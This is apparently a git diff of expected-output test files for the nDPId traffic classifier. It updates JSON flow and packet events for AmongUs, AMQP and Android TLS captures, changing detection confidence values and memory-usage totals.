+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} 
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":15,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 672 chars diff --git a/test/results/amqp.pcap.out b/test/results/amqp.pcap.out index 286fbed05..6130104e6 100644 --- a/test/results/amqp.pcap.out 
+++ b/test/results/amqp.pcap.out 
@@ -2,7 +2,7 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1490904166118} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} 
00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7580000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -11,13 +11,13 @@ 01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":160,"packets-processed":160,"total-skipped-flows":0,"total-l4-payload-len":12954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1490904170243} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 160/160 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882347 bytes -~~ total memory freed........: 5882347 bytes -~~ total allocations/frees...: 118285/118285 +~~ total memory allocated....: 6015981 bytes +~~ total memory freed........: 6015981 bytes +~~ total allocations/frees...: 121047/121047 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1071 chars 
diff --git a/test/results/android.pcap.out b/test/results/android.pcap.out index d1e346994..6eb377104 100644 --- a/test/results/android.pcap.out +++ b/test/results/android.pcap.out 
@@ -2,167 +2,168 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454769772} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} 
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
